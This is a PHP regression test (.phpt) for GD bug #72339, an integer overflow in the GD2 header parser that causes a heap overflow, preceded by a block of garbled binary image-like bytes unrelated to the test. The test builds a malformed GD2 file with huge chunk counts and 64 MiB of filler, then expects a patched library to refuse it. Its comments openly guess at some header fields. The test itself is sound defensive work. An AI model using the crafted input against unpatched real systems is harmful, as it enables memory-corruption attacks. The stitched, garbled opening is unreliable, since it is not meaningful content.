php IHDR w Q )Ba pHYs sRGB gAMA a IDATxMk\U s&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨ G;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j- $_q?qS XzG'ay
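--TEST--
Bug #72339 Integer Overflow in _gd2GetHeader() resulting in heap overflow
--SKIPIF--
<?php
// Nothing to test without the GD2 loader.
if (!function_exists("imagecreatefromgd2")) print "skip";
// With an external (non-bundled) libgd, only run from 2.2.2 onwards.
if (!GD_BUNDLED && version_compare(GD_VERSION, '2.2.2', '<')) {
    die("skip test requires GD 2.2.2 or higher");
}
?>
--FILE--
<?php
// Regression test: a GD2 header whose chunk counts make the loader's
// allocation-size multiplication exceed INT_MAX must be rejected with a
// warning rather than lead to an undersized heap buffer.
$fname = dirname(__FILE__) . DIRECTORY_SEPARATOR . "bug72339.gd";

// Header fields are written as 16-bit big-endian words (pack "n").
// Field names below follow the GD2 header layout as I understand it; only
// the two chunk counts are labelled in the original test.
$fh = fopen($fname, "w");
fwrite($fh, "gd2\x00");            // signature
fwrite($fh, pack("n", 2));         // version
fwrite($fh, pack("n", 1));         // image width
fwrite($fh, pack("n", 1));         // image height
fwrite($fh, pack("n", 0x40));      // chunk size
fwrite($fh, pack("n", 2));         // format (presumably the compressed variant; confirm)

// 0x5AA0 * 0x5B00 = 23200 * 23296 = 540,467,200, which still fits in an int.
// The overflow therefore comes from a further multiplication inside the
// loader, presumably by the size of a chunk index entry. TODO confirm
// against _gd2GetHeader().
fwrite($fh, pack("n", 0x5AA0));    // Chunks Wide
fwrite($fh, pack("n", 0x5B00));    // Chunks Vertically

// 4 bytes * 0x1000000 = 64 MiB of filler following the header.
fwrite($fh, str_repeat("\x41\x41\x41\x41", 0x1000000)); // overflow data
fclose($fh);

// A fixed library refuses the file, so $im is expected to be false here.
$im = imagecreatefromgd2($fname);

if ($im) {
    imagedestroy($im);
}
unlink($fname);

// Note on EXPECTF: %w matches optional whitespace, so the first warning
// matches whether or not GD ends its own message with a line break.
?>
--CLEAN--
<?php
// If the FILE section aborts before its unlink() (for example on a build
// without the fix), make sure the 64 MiB fixture does not stay behind.
$fname = dirname(__FILE__) . DIRECTORY_SEPARATOR . "bug72339.gd";
if (file_exists($fname)) {
    unlink($fname);
}
?>
--EXPECTF--
Warning: imagecreatefromgd2(): gd warning: product of memory allocation multiplication would exceed INT_MAX, failing operation gracefully%w in %sbug72339.php on line %d

Warning: imagecreatefromgd2(): '%sbug72339.gd' is not a valid GD2 file in %sbug72339.php on line %d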